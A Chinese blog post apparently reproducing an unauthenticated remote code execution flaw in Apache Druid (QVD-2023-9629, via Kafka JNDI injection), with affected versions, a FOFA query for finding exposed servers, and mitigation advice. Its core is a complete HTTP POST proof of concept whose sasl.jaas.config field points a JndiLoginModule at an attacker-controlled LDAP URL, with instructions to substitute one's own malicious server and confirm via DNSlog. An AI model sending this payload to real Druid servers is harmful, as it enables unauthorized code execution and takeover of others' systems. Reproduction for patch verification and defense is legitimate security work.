Apache Druid RCE漏洞复现(QVD-2023-9629)

最新推荐文章于 2024-04-15 05:06:23 发布
最新推荐文章于 2024-04-15 05:06:23 发布
阅读量843 收藏 1
点赞数
分类专栏: web安全 # 漏洞复现 文章标签: apache web安全 安全
原文链接:https://blog.csdn.net/qq_41904294/article/details/130379299
版权

0x01 产品简介

   Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有高度可扩展、低延迟和高吞吐量的特点,广泛应用于实时监控、事件驱动分析、用户行为分析、网络安全等领域。通过使用Druid,企业和开发者可以快速获得实时分析结果,提升决策效率。

0x02 漏洞概述

在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。(其他使用Apache Kafka Connect的产品也可能受CVE-2023-25194漏洞影响)

0x03 影响范围

影响版本

0.19.0 <= Apache Druid <= 25.0.0

不受影响版本

Apache Druid >= 26.0.0(修复版本尚未正式发布)

0x04 复现环境

FOFA语法:title="Apache Druid"

本次复现版本为:24.0.1 

0x05 漏洞复现

访问漏洞环境

 填入任意字符,点击apply,burp抓包

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close
 
{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"1.1.1.1:9092",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"any",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{
 
            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

修改请求包,user.provider.url处填写你的恶意ldap服务url

利用DNSlog验证漏洞是否存在

 漏洞存在

 0x06 修复建议

  安全更新

目前Apache Druid官方已临时修复了此漏洞,但尚未正式发布新版本,用户可下载源码编译使用。

用户可持续关注Apache Druid官方新版本发布,并及时更新。

参考:https://github.com/apache/druid/tree/26.0.0

   缓解措施

1、为Apache Druid 开启认证配置。

详情请见:https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html

2、在业务允许的情况下将Apache Druid移至内网。

 

 

zxl2605
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试漏洞复现Druid 未授权访问
HACKONE的博客
03-20 720
Druid是一个高效的数据查询系统,主要解决的是对于大量的基于时序的数据进行聚合查询。通常是基于时序的事实事件,事实发生后进入Druid,外部系统就可以对该事实进行查询。为了彻底避免未授权访问风险,如果不需要使用或者很少使用Druid的监控功能,可以尝试彻底禁用Druid监控页,这种做法比较简单粗暴,有利有弊。Druid是一个分布式数据分析平台,也是一个时序数据库,也是一个集群系统,使用zookeeper做节点管理和事件监控。(2)可能影响使用习惯,可能影响工作的开展,降低Druid管理的便利性。
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1686
Apache Druid远程代码执行漏洞(CVE-2021-25646)
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5367
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
漏洞复现-Apache Druid 任意文件读取 _(CVE-2021-36749)
qq_58683895的博客
10-27 195
​ 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。直接看一下tmp的文件,得到flag。
使用alibaba的运行druid-1.1.9.jar进行数据加密、踩坑及解决方案
swimming_sqp的博客
05-21 1485
1.首先运行win+r,并输入cmd命令,打开控制台,并找到存在druid-1.1.9.jar的目录下,此处使用的是druid的1.1.9版本,如下图: 2. 运行java -cp druid-1.1.9.jar com.alibaba.druid.filter.config.ConfigTools 需要加密的密码 ,加密后如下图所示 此处会生成 --私钥 privateKey:MIIBVQIBADANBgkqhkiG9w0BAQEFAASCAT8wggE7AgEAAkEAymIx8Y..
Apache Druid LoadData 任意文件读取漏洞
bqnagus
09-29 544
Apache Druid LoadData 任意文件读取漏洞,由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
apache-druid-chinese-docs:Apache Druid中文文档
05-03
Apache Druid是一个高性能的实时分析型数据库 [removed] (adsbygoogle = window.adsbygoogle || []).push({}); [removed] 云原生、流原生的分析型数据库 Druid专为需要快速数据查询与摄入的工作流程而设计,在即时...
druid-spring-boot-starter-1.2.8.jar
04-04
druid-spring-boot-starter-1.2.8.jar
参照阿里druid整理druid-spring-boot-starter的demo
06-14
参照阿里druid个人整理druid-spring-boot-starter可运行demo,细节方面自己完善
Goby 漏洞发布|Apache Druid Kafka Connect 远程代码执行漏洞(CVE-2024-25194)_druid kafka漏洞
2301_82243100的博客
04-15 438
它设计用于处理大规模的实时数据,并提供快速的交互式查询和分析。Apache Druid 使用了存在漏洞的 Kafka Connect,攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为恶意类,进而可导致JNDI注入漏洞,可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
qq_22807425的博客
02-02 695
Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 0x00 前言 首发于timeline sec 团队公众号 阿里云安全Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 0x01 漏洞描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的jso
Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
墨痕诉清风的博客
11-12 1万+
1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池.2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控.
一次 Druid 连接池泄露引发的血案!
Java技术栈,分享最主流的Java技术
03-12 4982
Java技术栈www.javastack.cn优秀的Java技术公众号最近某个应用程序老是卡,需要重启才能解决问题,导致被各种投诉,排查问题是 Drui...
druid监控页面未授权访问漏洞
m0_37354578的博客
06-30 1万+
一、项目环境 SpringBoot Version:2.4.5 二、问题场景 项目中引入druid-spring-boot-starter,且spring.datasource.druid.stat-view-servlet.enabled配置为true时,可以直接访问Druid Monitor监控平台,可能会造成企业机密信息被攻击者获取 <dependency> <groupId>com.alibaba</groupId> <artifactId&g
alibaba/druid 常见问题
codepython的专栏
01-03 3万+
1,363 Fork895 renfufei edited this page on 16 Sep 2014 · 51 revisions  Pages 54 Benchmark_aliyunContributorsDBCP迁移Druid Change Logdruid m
关于druid数据连接池抛出的 connection holder is null 异常
热门推荐
Nireus的技术博客记录
10-23 9万+
文章转自 今天在一台配置很低的机器上运行批量更新的程序~~~     大概跑了三十分钟~~~这配置~~~这程序~~~     然后华丽丽的报异常了~~~     具体异常是这样的, ? 1 2 3 4 5 6 7 8 9 10 11 12 13
摘要: Druid连接池一个设置引发的血案 -- 链接池出现问题
心有猛虎,细嗅蔷薇
08-29 2577
原文来自:http://www.cnblogs.com/water-1/p/6843960.html 摘要: Druid连接池一个设置引发的血案     今天在一台配置很低的机器上运行批量更新的程序~~~     大概跑了三十分钟~~~这配置~~~这程序~~~     然后华丽丽的报异常了~~~     具体异常是这样的, 1
Apache Druid rce漏洞
04-27
关于Apache DruidRCE漏洞,我可以为您提供一些基本信息。Apache Druid是一个高性能、实时分析数据的开源数据存储系统,常用于数据探索和可视化分析。2021年5月,Apache Druid官方发布了一份安全公告,称该软件存在一个高风险的远程代码执行(RCE漏洞,该漏洞可能导致攻击者可以通过恶意负载文件执行任意代码,甚至可能完全控制受影响的系统。建议用户及时升级到受影响版本的补丁版本。同时,我们也应该加强对系统的安全审计和管理,以及对软件漏洞的及时关注和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值